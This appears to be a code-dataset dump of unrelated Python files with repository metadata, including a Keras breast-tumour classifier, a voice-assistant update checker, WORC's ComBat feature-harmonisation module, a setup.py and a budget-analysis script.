"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Wed Oct 17 21:04:48 2018
@author: Alex Alves
Program to determine whether a breast tumour
is benign (output 0) or malignant (output 1)
"""
import pandas as pa
# Import used to split the data between network training and validation/test sets
from sklearn.model_selection import train_test_split
import keras
from keras.models import Sequential
from keras.layers import Dense
from sklearn.metrics import confusion_matrix, accuracy_score
entrada = pa.read_csv('entradas-breast.csv')
esperado = pa.read_csv('saidas-breast.csv')
# Training with 75% of the data, validation with 25%
entrada_treinar, entrada_teste, esperado_treinar,esperado_teste =train_test_split(entrada,esperado,test_size=0.25)
# Creating the neural network
detectar_cancer = Sequential()
# Adding the input layer
detectar_cancer.add(Dense(units=16,activation='relu',kernel_initializer='random_uniform',input_dim=30))
# Adding a hidden layer
detectar_cancer.add(Dense(units=16,activation='relu',kernel_initializer='random_uniform'))
# Adding the output layer
detectar_cancer.add(Dense(units=1,activation='sigmoid'))
# Compile the network
# compile(gradient descent optimizer, error function - binary cross-entropy, network accuracy metric)
# clipvalue -> limits the weight updates between 0.5 and -0.5
# lr = step size, decay -> step-size reduction
otimizar = keras.optimizers.Adam(lr=0.001,decay=0.0001)
# In this case clipvalue hurt performance
#otimizar = keras.optimizers.Adam(lr=0.004,decay=0.0001,clipvalue=0.5)
detectar_cancer.compile(otimizar,loss='binary_crossentropy',metrics=['binary_accuracy'])
#detectar_cancer.compile(optimizer='adam',loss='binary_crossentropy',metrics=['binary_accuracy'])
# Train the network - the error is computed over batches of 10 samples,
# then the weights are updated: stochastic gradient descent, 10 samples at a time
detectar_cancer.fit(entrada_treinar,esperado_treinar,batch_size=10,epochs=100)
# Retrieving the layer weights
pesosCamadaEntrada = detectar_cancer.layers[0].get_weights()
pesosCamadaOculta = detectar_cancer.layers[1].get_weights()
pesosCamadaSaida = detectar_cancer.layers[2].get_weights()
# Running the validation test
# returns the predicted probability for each sample
validar = detectar_cancer.predict(entrada_teste)
# converting to true or false (1 or 0) for comparison:
# greater than 0.5 is true, otherwise false
validar = (validar > 0.5)
# compares the two vectors and computes the accuracy
# of the network on the held-out test set
precisao = accuracy_score(esperado_teste,validar)
# Confusion matrix of the network's predictions
acertos = confusion_matrix(esperado_teste,validar)
# Another way to get results:
# returns the loss and the accuracy
resultado = detectar_cancer.evaluate(entrada_teste, esperado_teste)
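# Editor's note (not part of the original script): `resultado` holds the output of
# Keras' evaluate(), i.e. [loss, binary_accuracy] on the test split, while `precisao`
# and `acertos` give the sklearn accuracy score and confusion matrix for the same data.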
| 33.216867
| 114
| 0.791077
| 406
| 2,757
| 5.251232
| 0.448276
| 0.078799
| 0.023921
| 0.030957
| 0.149625
| 0.136961
| 0.06848
| 0.06848
| 0.06848
| 0.06848
| 0
| 0.030826
| 0.117519
| 2,757
| 82
| 115
| 33.621951
| 0.845458
| 0.478781
| 0
| 0
| 0
| 0
| 0.080657
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.25
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f587bf36e711ee18aa81e26269a6338ac9328eb
| 1,388
|
py
|
Python
|
Stephanie/updater.py
|
JeremyARussell/stephanie-va
|
acc894fa69b4e5559308067d525f71f951ecc258
|
[
"MIT"
] | 866
|
2017-06-10T19:25:28.000Z
|
2022-01-06T18:29:36.000Z
|
Stephanie/updater.py
|
JeremyARussell/stephanie-va
|
acc894fa69b4e5559308067d525f71f951ecc258
|
[
"MIT"
] | 54
|
2017-06-11T06:41:19.000Z
|
2022-01-10T23:06:03.000Z
|
Stephanie/updater.py
|
JeremyARussell/stephanie-va
|
acc894fa69b4e5559308067d525f71f951ecc258
|
[
"MIT"
] | 167
|
2017-06-10T19:32:54.000Z
|
2022-01-03T07:01:39.000Z
|
import requests
from Stephanie.configurer import config
class Updater:
def __init__(self, speaker):
self.speaker = speaker
self.c = config
self.current_version = self.c.config.get("APPLICATION", "version")
self.update_url = "https://raw.githubusercontent.com/SlapBot/va-version-check/master/version.json"
self.requests = requests
self.data = None
def check_for_update(self):
try:
self.data = self.get_update_information()
except Exception:
print("Couldn't access stephanie's version update information.")
return
try:
if str(self.current_version) != str(self.data['version']):
print("Your virtual assistant's version is %s, while the latest one is %s" % (self.current_version, self.data['version']))
if int(self.data['print_status']):
print("Kindly visit the main website of stephanie at www.github.com/slapbot/stephanie-va to update the software to it's latest version.")
if int(self.data['speak_status']):
self.speaker.speak(self.data['message'])
for message in self.data['additional_information']:
print(message)
if self.data['speak_announcement']:
self.speaker.speak(self.data['speak_announcement'])
except Exception:
print("There's some problem in recieving version update information.")
return
def get_update_information(self):
r = self.requests.get(self.update_url)
data = r.json()
return data
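
# --- Editor's sketch (not part of the original module) -------------------------------
# Updater only relies on the speaker exposing a `speak(text)` method; the stand-in
# speaker below is hypothetical and simply prints what would be spoken aloud.
if __name__ == "__main__":
    class _PrintSpeaker:
        def speak(self, text):
            print(text)

    Updater(_PrintSpeaker()).check_for_update()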
| 34.7
| 142
| 0.730548
| 195
| 1,388
| 5.097436
| 0.379487
| 0.080483
| 0.054326
| 0.044266
| 0.088531
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.146974
| 1,388
| 39
| 143
| 35.589744
| 0.839527
| 0
| 0
| 0.176471
| 0
| 0.058824
| 0.366715
| 0.041066
| 0
| 0
| 0
| 0
| 0
| 1
| 0.088235
| false
| 0
| 0.058824
| 0
| 0.264706
| 0.176471
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f591fe59a581e7f936f818cedb0f094b131b698
| 24,533
|
py
|
Python
|
WORC/featureprocessing/ComBat.py
|
MStarmans91/WORC
|
b6b8fc2ccb7d443a69b5ca20b1d6efb65b3f0fc7
|
[
"ECL-2.0",
"Apache-2.0"
] | 47
|
2018-01-28T14:08:15.000Z
|
2022-03-24T16:10:07.000Z
|
WORC/featureprocessing/ComBat.py
|
JZK00/WORC
|
14e8099835eccb35d49b52b97c0be64ecca3809c
|
[
"ECL-2.0",
"Apache-2.0"
] | 13
|
2018-08-28T13:32:57.000Z
|
2020-10-26T16:35:59.000Z
|
WORC/featureprocessing/ComBat.py
|
JZK00/WORC
|
14e8099835eccb35d49b52b97c0be64ecca3809c
|
[
"ECL-2.0",
"Apache-2.0"
] | 16
|
2017-11-13T10:53:36.000Z
|
2022-03-18T17:02:04.000Z
|
#!/usr/bin/env python
# Copyright 2020 Biomedical Imaging Group Rotterdam, Departments of
# Medical Informatics and Radiology, Erasmus MC, Rotterdam, The Netherlands
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import subprocess
import scipy.io as sio
import WORC.IOparser.file_io as wio
import WORC.IOparser.config_io_combat as cio
import numpy as np
import random
import pandas as pd
from WORC.addexceptions import WORCValueError, WORCKeyError
import tempfile
from sys import platform
from WORC.featureprocessing.VarianceThreshold import selfeat_variance
from sklearn.preprocessing import StandardScaler
from neuroCombat import neuroCombat
import matplotlib
matplotlib.use('agg')
import matplotlib.pyplot as plt
from WORC.featureprocessing.Imputer import Imputer
def ComBat(features_train_in, labels_train, config, features_train_out,
features_test_in=None, labels_test=None, features_test_out=None,
VarianceThreshold=True, scaler=False, logarithmic=False):
"""
Apply ComBat feature harmonization.
Based on: https://github.com/Jfortin1/ComBatHarmonization
"""
# Load the config
print('############################################################')
print('# Initializing ComBat. #')
print('############################################################\n')
config = cio.load_config(config)
excluded_features = config['ComBat']['excluded_features']
# If mod, than also load moderating labels
if config['ComBat']['mod'][0] == '[]':
label_names = config['ComBat']['batch']
else:
label_names = config['ComBat']['batch'] + config['ComBat']['mod']
# Load the features for both training and testing, match with batch and mod parameters
label_data_train, image_features_train =\
wio.load_features(features_train_in, patientinfo=labels_train,
label_type=label_names)
feature_labels = image_features_train[0][1]
image_features_train = [i[0] for i in image_features_train]
label_data_train['patient_IDs'] = list(label_data_train['patient_IDs'])
# Exclude features
if excluded_features:
print(f'\t Excluding features containing: {excluded_features}')
# Determine indices of excluded features
included_feature_indices = []
excluded_feature_indices = []
for fnum, i in enumerate(feature_labels):
if not any(e in i for e in excluded_features):
included_feature_indices.append(fnum)
else:
excluded_feature_indices.append(fnum)
# Actually exclude the features
image_features_train_combat = [np.asarray(i)[included_feature_indices].tolist() for i in image_features_train]
feature_labels_combat = np.asarray(feature_labels)[included_feature_indices].tolist()
image_features_train_noncombat = [np.asarray(i)[excluded_feature_indices].tolist() for i in image_features_train]
feature_labels_noncombat = np.asarray(feature_labels)[excluded_feature_indices].tolist()
else:
image_features_train_combat = image_features_train
feature_labels_combat = feature_labels.tolist()
image_features_train_noncombat = []
feature_labels_noncombat = []
# Detect NaNs, otherwise first feature imputation is required
if any(np.isnan(a) for a in np.asarray(image_features_train_combat).flatten()):
print('\t [WARNING] NaNs detected, applying median imputation')
imputer = Imputer(missing_values=np.nan, strategy='median')
imputer.fit(image_features_train_combat)
image_features_train_combat = imputer.transform(image_features_train_combat)
else:
imputer = None
# Apply a scaler to the features
if scaler:
print('\t Fitting scaler on dataset.')
scaler = StandardScaler().fit(image_features_train_combat)
image_features_train_combat = scaler.transform(image_features_train_combat)
# Remove features with a constant value
if VarianceThreshold:
print(f'\t Applying variance threshold on dataset.')
image_features_train_combat, feature_labels_combat, VarSel =\
selfeat_variance(image_features_train_combat, np.asarray([feature_labels_combat]))
feature_labels_combat = feature_labels_combat[0].tolist()
if features_test_in:
label_data_test, image_features_test =\
wio.load_features(features_test_in, patientinfo=labels_test,
label_type=label_names)
image_features_test = [i[0] for i in image_features_test]
label_data_test['patient_IDs'] = list(label_data_test['patient_IDs'])
if excluded_features:
image_features_test_combat = [np.asarray(i)[included_feature_indices].tolist() for i in image_features_test]
image_features_test_noncombat = [np.asarray(i)[excluded_feature_indices].tolist() for i in image_features_test]
else:
image_features_test_combat = image_features_test
image_features_test_noncombat = []
# Apply imputation if required
if imputer is not None:
image_features_test_combat = imputer.transform(image_features_test_combat)
# Apply a scaler to the features
if scaler:
image_features_test_combat = scaler.transform(image_features_test_combat)
# Remove features with a constant value
if VarianceThreshold:
image_features_test_combat = VarSel.transform(image_features_test_combat)
all_features = image_features_train_combat.tolist() + image_features_test_combat.tolist()
all_labels = list()
for i in range(label_data_train['label'].shape[0]):
all_labels.append(label_data_train['label'][i, :, 0].tolist() + label_data_test['label'][i, :, 0].tolist())
all_labels = np.asarray(all_labels)
else:
all_features = image_features_train_combat.tolist()
all_labels = label_data_train['label']
# Convert data to a single array
all_features_matrix = np.asarray(all_features)
all_labels = np.squeeze(all_labels)
# Apply logarithm if required
if logarithmic:
print('\t Taking log10 of features before applying ComBat.')
all_features_matrix = np.log10(all_features_matrix)
# Convert all_labels to dictionary
if len(all_labels.shape) == 1:
# No mod variables
all_labels = {label_data_train['label_name'][0]: all_labels}
else:
all_labels = {k: v for k, v in zip(label_data_train['label_name'], all_labels)}
# Split labels in batch and moderation labels
bat = config['ComBat']['batch']
mod = config['ComBat']['mod']
print(f'\t Using batch variable {bat}, mod variables {mod}.')
batch = [all_labels[l] for l in all_labels.keys() if l in config['ComBat']['batch']]
batch = batch[0]
if config['ComBat']['mod'][0] == '[]':
mod = None
else:
mod = [all_labels[l] for l in all_labels.keys() if l in config['ComBat']['mod']]
# Set parameters for output files
parameters = {'batch': config['ComBat']['batch'],
'mod': config['ComBat']['mod'],
'par': config['ComBat']['par']}
name = 'Image features: ComBat corrected'
panda_labels = ['parameters',
'patient',
'feature_values',
'feature_labels']
feature_labels = feature_labels_combat + feature_labels_noncombat
# Convert all inputs to arrays with right shape
all_features_matrix = np.transpose(all_features_matrix)
if mod is not None:
mod = np.transpose(np.asarray(mod))
# Patients identified with batch -1.0 should be skipped
skipname = 'Image features: ComBat skipped'
ntrain = len(image_features_train_combat)
ndel = 0
print(features_test_out)
for bnum, b in enumerate(batch):
bnum -= ndel
if b == -1.0:
if bnum < ntrain - ndel:
# Training patient
print('train')
pid = label_data_train['patient_IDs'][bnum]
out = features_train_out[bnum]
# Combine ComBat and non-ComBat features
feature_values_temp = list(all_features_matrix[:, bnum]) + list(image_features_train_noncombat[bnum])
# Delete patient for later processing
del label_data_train['patient_IDs'][bnum]
del image_features_train_noncombat[bnum]
del features_train_out[bnum]
image_features_train_combat = np.delete(image_features_train_combat, bnum, 0)
else:
# Test patient
print('test')
pid = label_data_test['patient_IDs'][bnum - ntrain]
out = features_test_out[bnum - ntrain]
# Combine ComBat and non-ComBat features
feature_values_temp = list(all_features_matrix[:, bnum]) + list(image_features_test_noncombat[bnum - ntrain])
# Delete patient for later processing
del label_data_test['patient_IDs'][bnum - ntrain]
del image_features_test_noncombat[bnum - ntrain]
del features_test_out[bnum - ntrain]
image_features_test_combat = np.delete(image_features_test_combat, bnum - ntrain, 0)
# Delete some other variables for later processing
all_features_matrix = np.delete(all_features_matrix, bnum, 1)
if mod is not None:
mod = np.delete(mod, bnum, 0)
batch = np.delete(batch, bnum, 0)
# Notify user
print(f'[WARNING] Skipping patient {pid} as batch variable is -1.0.')
# Sort based on feature label
feature_labels_temp, feature_values_temp =\
zip(*sorted(zip(feature_labels, feature_values_temp)))
# Convert to pandas Series and save as hdf5
panda_data = pd.Series([parameters, pid, feature_values_temp,
feature_labels_temp],
index=panda_labels,
name=skipname
)
print(f'\t Saving image features to: {out}.')
panda_data.to_hdf(out, 'image_features')
ndel += 1
print(features_test_out)
# Run ComBat in Matlab
if config['ComBat']['language'] == 'matlab':
print('\t Executing ComBat through Matlab')
data_harmonized = ComBatMatlab(dat=all_features_matrix,
batch=batch,
command=config['ComBat']['matlab'],
mod=mod,
par=config['ComBat']['par'],
per_feature=config['ComBat']['per_feature'])
elif config['ComBat']['language'] == 'python':
print('\t Executing ComBat through neuroComBat in Python')
data_harmonized = ComBatPython(dat=all_features_matrix,
batch=batch,
mod=mod,
eb=config['ComBat']['eb'],
par=config['ComBat']['par'],
per_feature=config['ComBat']['per_feature'])
else:
raise WORCKeyError(f"Language {config['ComBat']['language']} unknown.")
# Convert values back if logarithm was used
if logarithmic:
data_harmonized = 10 ** data_harmonized
# Convert again to train hdf5 files
feature_values_train_combat = [data_harmonized[:, i] for i in range(len(image_features_train_combat))]
for fnum, i_feat in enumerate(feature_values_train_combat):
# Combine ComBat and non-ComBat features
feature_values_temp = i_feat.tolist() + image_features_train_noncombat[fnum]
# Sort based on feature label
feature_labels_temp, feature_values_temp =\
zip(*sorted(zip(feature_labels, feature_values_temp)))
# Convert to pandas Series and save as hdf5
pid = label_data_train['patient_IDs'][fnum]
panda_data = pd.Series([parameters, pid, feature_values_temp,
feature_labels_temp],
index=panda_labels,
name=name
)
print(f'Saving image features to: {features_train_out[fnum]}.')
panda_data.to_hdf(features_train_out[fnum], 'image_features')
# Repeat for testing if required
if features_test_in:
print(len(image_features_test_combat))
print(data_harmonized.shape[1])
feature_values_test_combat = [data_harmonized[:, i] for i in range(data_harmonized.shape[1] - len(image_features_test_combat), data_harmonized.shape[1])]
for fnum, i_feat in enumerate(feature_values_test_combat):
print(fnum)
# Combine ComBat and non-ComBat features
feature_values_temp = i_feat.tolist() + image_features_test_noncombat[fnum]
# Sort based on feature label
feature_labels_temp, feature_values_temp =\
zip(*sorted(zip(feature_labels, feature_values_temp)))
# Convert to pandas Series and save as hdf5
pid = label_data_test['patient_IDs'][fnum]
panda_data = pd.Series([parameters, pid, feature_values_temp,
feature_labels_temp],
index=panda_labels,
name=name
)
print(f'Saving image features to: {features_test_out[fnum]}.')
panda_data.to_hdf(features_test_out[fnum], 'image_features')
def ComBatPython(dat, batch, mod=None, par=1,
eb=1, per_feature=False, plotting=False):
"""
Run the ComBat Function python script.
par = 0 is non-parametric.
"""
# convert inputs to neuroCombat format.
covars = dict()
categorical_cols = list()
covars['batch'] = batch
if mod is not None:
for i_mod in range(mod.shape[1]):
label = f'mod_{i_mod}'
covars[label] = [m for m in mod[:, i_mod]]
categorical_cols.append(label)
covars = pd.DataFrame(covars)
batch_col = 'batch'
if par == 0:
parametric = False
elif par == 1:
parametric = True
else:
raise WORCValueError(f'Par should be 0 or 1, now {par}.')
if eb == 0:
eb = False
elif eb == 1:
eb = True
else:
raise WORCValueError(f'eb should be 0 or 1, now {eb}.')
if per_feature == 0:
per_feature = False
elif per_feature == 1:
per_feature = True
else:
raise WORCValueError(f'per_feature should be 0 or 1, now {per_feature}.')
# execute ComBat
if not per_feature:
data_harmonized = neuroCombat(dat=dat, covars=covars, batch_col=batch_col,
categorical_cols=categorical_cols,
eb=eb, parametric=parametric)
elif per_feature:
print('\t Executing ComBat per feature.')
data_harmonized = np.zeros(dat.shape)
# Shape: (features, samples)
for i in range(dat.shape[0]):
if eb:
# Copy feature + random noise
random_feature = np.random.rand(dat[i, :].shape[0])
feat_temp = np.asarray([dat[i, :], dat[i, :] + random_feature])
else:
# Just use the single feature
feat_temp = np.asarray([dat[i, :]])
feat_temp = neuroCombat(dat=feat_temp, covars=covars,
batch_col=batch_col,
categorical_cols=categorical_cols,
eb=eb, parametric=parametric)
data_harmonized[i, :] = feat_temp[0, :]
if plotting:
feat1 = dat[i, :]
feat1_harm = data_harmonized[i, :]
print(len(feat1))
feat1_b1 = [f for f, b in zip(feat1, batch[0]) if b == 1.0]
feat1_b2 = [f for f, b in zip(feat1, batch[0]) if b == 2.0]
print(len(feat1_b1))
print(len(feat1_b2))
feat1_harm_b1 = [f for f, b in zip(feat1_harm, batch[0]) if b == 1.0]
feat1_harm_b2 = [f for f, b in zip(feat1_harm, batch[0]) if b == 2.0]
plt.figure()
ax = plt.subplot(2, 1, 1)
ax.scatter(np.ones((len(feat1_b1))), feat1_b1, color='red')
ax.scatter(np.ones((len(feat1_b2))) + 1, feat1_b2, color='blue')
plt.title('Before Combat')
ax = plt.subplot(2, 1, 2)
ax.scatter(np.ones((len(feat1_b1))), feat1_harm_b1, color='red')
ax.scatter(np.ones((len(feat1_b2))) + 1, feat1_harm_b2, color='blue')
plt.title('After Combat')
plt.show()
else:
raise WORCValueError(f'per_feature should be False or True, now {per_feature}.')
return data_harmonized
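# Editor's note (not part of the original module): ComBatPython expects `dat` shaped as
# (n_features, n_samples) with one batch label per sample, and `mod`, when given, shaped
# (n_samples, n_moderators); the Synthetictest function below builds data in that layout.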
def Synthetictest(n_patients=50, n_features=10, par=1, eb=1,
per_feature=False, difscale=False, logarithmic=False,
oddpatient=True, oddfeat=True, samefeat=True):
"""Test for ComBat with Synthetic data."""
features = np.zeros((n_features, n_patients))
batch = list()
# First batch: Gaussian with loc 0, scale 1
for i in range(0, int(n_patients/2)):
feat_temp = [np.random.normal(loc=0.0, scale=1.0) for i in range(n_features)]
if i == 1 and oddpatient:
feat_temp = [np.random.normal(loc=10.0, scale=1.0) for i in range(n_features)]
elif oddfeat:
feat_temp = [np.random.normal(loc=0.0, scale=1.0) for i in range(n_features - 1)] + [np.random.normal(loc=10000.0, scale=1.0)]
if samefeat:
feat_temp[-1] = 1
features[:, i] = feat_temp
batch.append(1)
# Get directions for features
directions = list()
for i in range(n_features):
direction = random.random()
if direction > 0.5:
directions.append(1.0)
else:
directions.append(-1.0)
# First batch: Gaussian with loc 5, scale 1
for i in range(int(n_patients/2), n_patients):
feat_temp = [np.random.normal(loc=direction*5.0, scale=1.0) for i in range(n_features)]
if oddfeat:
feat_temp = [np.random.normal(loc=5.0, scale=1.0) for i in range(n_features - 1)] + [np.random.normal(loc=10000.0, scale=1.0)]
if difscale:
feat_temp = [f + 1000 for f in feat_temp]
feat_temp = np.multiply(feat_temp, directions)
if samefeat:
feat_temp[-1] = 1
features[:, i] = feat_temp
batch.append(2)
# Create mod var
mod = [[np.random.randint(30, 100) for i in range(n_patients)]]
# Apply ComBat
batch = np.asarray([batch])
mod = np.transpose(np.asarray(mod))
if logarithmic:
minfeat = np.min(features)
features = np.log10(features + np.abs(minfeat) + 1E-100)
data_harmonized = ComBatPython(dat=features, batch=batch, mod=mod, par=par,
eb=eb, per_feature=per_feature)
if logarithmic:
data_harmonized = 10 ** data_harmonized - np.abs(minfeat)
for i in range(n_features):
f = plt.figure()
ax = plt.subplot(2, 1, 1)
ax.scatter(np.ones((int(n_patients/2))), features[i, 0:int(n_patients/2)], color='red')
ax.scatter(np.ones((n_patients - int(n_patients/2))) + 1, features[i, int(n_patients/2):], color='blue')
plt.title('Before Combat')
ax = plt.subplot(2, 1, 2)
ax.scatter(np.ones((int(n_patients/2))), data_harmonized[i, 0:int(n_patients/2)], color='red')
ax.scatter(np.ones((n_patients - int(n_patients/2))) + 1, data_harmonized[i, int(n_patients/2):], color='blue')
plt.title('After Combat')
plt.show()
f.savefig(f'combat_par{par}_eb{eb}_perfeat{per_feature}_feat{i}.png')
# Logarithmic transform: not useful, as we have negative numbers and (almost) zeros,
# so ComBat gives unusable results.
# Same feature twice with eb and par: nans
def ComBatMatlab(dat, batch, command, mod=None, par=1, per_feature='true'):
"""
Run the ComBat Function Matlab script.
par = 0 is non-parametric.
"""
# Mod: default argument is empty list
if mod is None:
mod = []
# TODO: Add check whether matlab executable is found
# Save the features in a .mat MatLab Compatible format
# NOTE: Should change this_folder to a proper temporary directory
this_folder = os.path.dirname(os.path.realpath(__file__))
tempdir = tempfile.gettempdir()
tempfile_in = os.path.join(tempdir, 'combat_input.mat')
tempfile_out = os.path.join(tempdir, 'combat_output.mat')
ComBatFolder = os.path.join(os.path.dirname(this_folder),
'external',
'ComBatHarmonization',
'Matlab',
'scripts')
matlab_input = {'output': tempfile_out,
'ComBatFolder': ComBatFolder,
'datvar': dat,
'batchvar': batch,
'modvar': mod,
'parvar': par,
'per_feature': per_feature
}
sio.savemat(tempfile_in, matlab_input)
# Make sure there is no tempfile out from the previous run
if os.path.exists(tempfile_out):
os.remove(tempfile_out)
# Run ComBat
currentdir = os.getcwd()
if platform == "linux" or platform == "linux2":
commandseparator = ' ; '
elif platform == "win32":
commandseparator = ' & '
# BIGR Cluster: /cm/shared/apps/matlab/R2015b/bin/matlab
regcommand = ('cd "' + this_folder + '"' + commandseparator +
'"' + command + '" -nodesktop -nosplash -nojvm -r "combatmatlab(' + "'" + str(tempfile_in) + "'" + ')"' +
commandseparator +
'cd "' + currentdir + '"')
print(f'Executing ComBat in Matlab through command: {regcommand}.')
proc = subprocess.Popen(regcommand,
shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
proc.wait()
stdout_value, stderr_value = proc.communicate()
# BUG: Waiting does not work, just wait for output to arrive, either with
# the actual output or an error message
success = False
while success is False:
if os.path.exists(tempfile_out):
try:
mat_dict = sio.loadmat(tempfile_out)
try:
data_harmonized = mat_dict['data_harmonized']
success = True
except KeyError:
try:
message = mat_dict['message']
raise WORCValueError(f'Error in Matlab ComBat execution: {message}.')
except KeyError:
pass
except (sio.matlab.miobase.MatReadError, ValueError):
pass
# Check if expected output file exists
if not os.path.exists(tempfile_out):
raise WORCValueError(f'Error in Matlab ComBat execution: command: {regcommand}, stdout: {stdout_value}, stderr: {stderr_value}')
# Read the output from ComBat
mat_dict = sio.loadmat(tempfile_out)
data_harmonized = mat_dict['data_harmonized']
data_harmonized = np.transpose(data_harmonized)
# Remove temporary files
os.remove(tempfile_out)
os.remove(tempfile_in)
return data_harmonized
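# Clarifying note (editor's addition): ComBatMatlab communicates with the Matlab
# script purely through the two .mat files above. combatmatlab() is expected to
# write either a 'data_harmonized' matrix or, on failure, a 'message' string into
# combat_output.mat, which the polling loop keeps re-reading until one of those
# keys appears. A minimal stand-in for testing that handshake from Python would be:
#   sio.savemat(tempfile_out, {'data_harmonized': np.zeros((2, 3))})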
| 40.684909
| 161
| 0.604329
| 2,968
| 24,533
| 4.798854
| 0.152628
| 0.055676
| 0.03665
| 0.028646
| 0.441831
| 0.35105
| 0.290739
| 0.246367
| 0.205294
| 0.186407
| 0
| 0.013316
| 0.292871
| 24,533
| 602
| 162
| 40.752492
| 0.807701
| 0.134309
| 0
| 0.252451
| 0
| 0.002451
| 0.103574
| 0.012325
| 0
| 0
| 0
| 0.001661
| 0
| 1
| 0.009804
| false
| 0.004902
| 0.041667
| 0
| 0.056373
| 0.066176
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f59e320e469d3924b3247fe49f94eea11acee62
| 727
|
py
|
Python
|
setup.py
|
mariocesar/pg-worker
|
d79c6daa8825226c754330c21150e4e416b09005
|
[
"MIT"
] | 1
|
2020-06-03T21:21:03.000Z
|
2020-06-03T21:21:03.000Z
|
setup.py
|
mariocesar/pg-worker
|
d79c6daa8825226c754330c21150e4e416b09005
|
[
"MIT"
] | null | null | null |
setup.py
|
mariocesar/pg-worker
|
d79c6daa8825226c754330c21150e4e416b09005
|
[
"MIT"
] | null | null | null |
import os
import sys
from setuptools import setup, find_packages
ROOT = os.path.realpath(os.path.join(os.path.dirname(
sys.modules['__main__'].__file__)))
sys.path.insert(0, os.path.join(ROOT, 'src'))
setup(
name='pgworker',
packages=find_packages('src'),
package_dir={'': 'src'},
classifiers=[
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
],
entry_points={
'console_scripts': [
'pgworker = pgworker.runner:main'
]
}
)
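# Usage sketch (editor's addition, assuming the commands are run from the
# repository root): installing the package exposes the console script declared in
# entry_points above.
#   pip install -e .
#   pgworker --help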
| 24.233333
| 53
| 0.603851
| 77
| 727
| 5.532468
| 0.571429
| 0.056338
| 0.176056
| 0.122066
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010929
| 0.244842
| 727
| 29
| 54
| 25.068966
| 0.765027
| 0
| 0
| 0
| 0
| 0
| 0.394773
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.125
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f5a0eafce7a5f076591e84cd9440a10e1d4e795
| 2,040
|
py
|
Python
|
PyBank/main.py
|
gentikosumi/python-challenge
|
e6532bf1033f5272616d4f8a1cf623bbafe1a1c2
|
[
"ADSL"
] | null | null | null |
PyBank/main.py
|
gentikosumi/python-challenge
|
e6532bf1033f5272616d4f8a1cf623bbafe1a1c2
|
[
"ADSL"
] | null | null | null |
PyBank/main.py
|
gentikosumi/python-challenge
|
e6532bf1033f5272616d4f8a1cf623bbafe1a1c2
|
[
"ADSL"
] | null | null | null |
import os
import csv
path = '/Users/kevinkosumi12345/Genti/python-challenge/PyBank/Resources/budget_data.csv'
budget_csv=os.path.join("../Resources", "budget_data.csv")
csvfile = open(path, newline="")
reader=csv.reader(csvfile, delimiter=",")
header = next(reader)
# print(header)
# the columns we have to convert into lists
# Create first 2 empty lists according 2 columns
date = []
profloss = []
# print("Financial Anaysis")
# print("-----------------------------------------")
for row in reader:
date.append(row[0])
profloss.append(int(row[1]))
# getting the total of Profit/Losses
total_profloss='Total Profit/Losses: $ ' + str(sum(profloss))
# print(total_profloss)
# getting the number of months in entire period
monthcount = 'Total months: ' + str(len(date))
# print(monthcount)
# before finding the average of change in Profit/Losses, first we have to find the total change
Total_change_profloss = 0
for x in range(1, len(profloss)):
Total_change_profloss = Total_change_profloss + (profloss[x] - profloss[x-1])
# finding the average of change in Profit/Losses
avg_change_profloss = 'Average change in Profit/Loss: ' + str(round(Total_change_profloss/(len(profloss)-1),2))
# print(avg_change_profloss)
# getting the max value of data in Profit/Losses which is the Greatest Increase of Profit/Losses
maxVal = 'Greatest increase of Profit/Losses: ' + ' on ' + str(date[profloss.index(max(profloss))]) + ' $ ' + str(max(profloss))
# print(maxVal)
# the min Value of date in Profit/Losses which is the Greatest Decrease
minVal = 'Greatest decrease of Profit/Losses: ' + ' on ' + str(date[profloss.index(min(profloss))]) + ' $ ' + str(min(profloss))
# print(minVal)
DataBudget = open('analisis.csv' , 'w')
DataBudget.write('Financial Analysis\n')
DataBudget.write('------------------------\n')
DataBudget.write(monthcount + '\n')
DataBudget.write(total_profloss + '\n')
DataBudget.write(avg_change_profloss + '\n')
DataBudget.write(maxVal + '\n')
DataBudget.write(minVal + '\n')
DataBudget.close()
| 30.909091
| 129
| 0.702451
| 278
| 2,040
| 5.082734
| 0.320144
| 0.076433
| 0.067941
| 0.031139
| 0.154282
| 0.096249
| 0.096249
| 0.050955
| 0
| 0
